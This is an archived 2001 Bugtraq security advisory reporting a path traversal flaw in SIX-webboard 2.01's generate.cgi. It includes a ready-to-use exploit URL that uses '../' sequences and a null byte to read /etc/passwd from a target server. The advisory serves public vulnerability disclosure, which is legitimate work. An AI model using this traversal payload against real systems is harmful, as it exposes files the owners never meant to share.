Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SIX-webboard 2.01 "show files" vulnerability

From: Hannibal Lector <digitalseed () poizonb0x org>
Date: 13 Aug 2001 16:15:33 -0000
* a little bit late, but "it's better late than never"! * 

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-
---------------

-NAME:
 SIX-webboard 2.01 "show files" vulnerability.

-DESCRIPTION: 
 Little, but very popular webboard coded by Pipo 
(webmaster () sixhead com). 
Find more information about the SIX-webboard here: 
http://www.sixhead.com
or http://www.sixhead.net.

-PROBLEM:
 '..' and '/' are not filtered while processing user input, 
so it is
possible to enter arbitrary values to retreive files from 
remote sever,
which should not be accessible normally.

-EXPLOIT: 
 http://www.target.net/cgi-bin/webboard/generate.cgi
?content=../../../../../../../../../etc/passwd%
00&board=boardsname
!The above line if given will output the file contents 
of /etc/passwd

-AUTHORs:
 Discovery: digitalseed and k$en0r
 Advisory: digitalseed

-DISCLAIMER:
 PoizonB0x may not be held liable for the use or 
potential
effects of these programs or advisories, nor the 
content contained
within. Use them at your own risk.

-COPYRIGHT:
 PoizonB0x Crew -  www.poizonb0x.org (c) 2000-
2001

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-
---------------
Previous By Date Next
Previous By Thread Next

Current thread: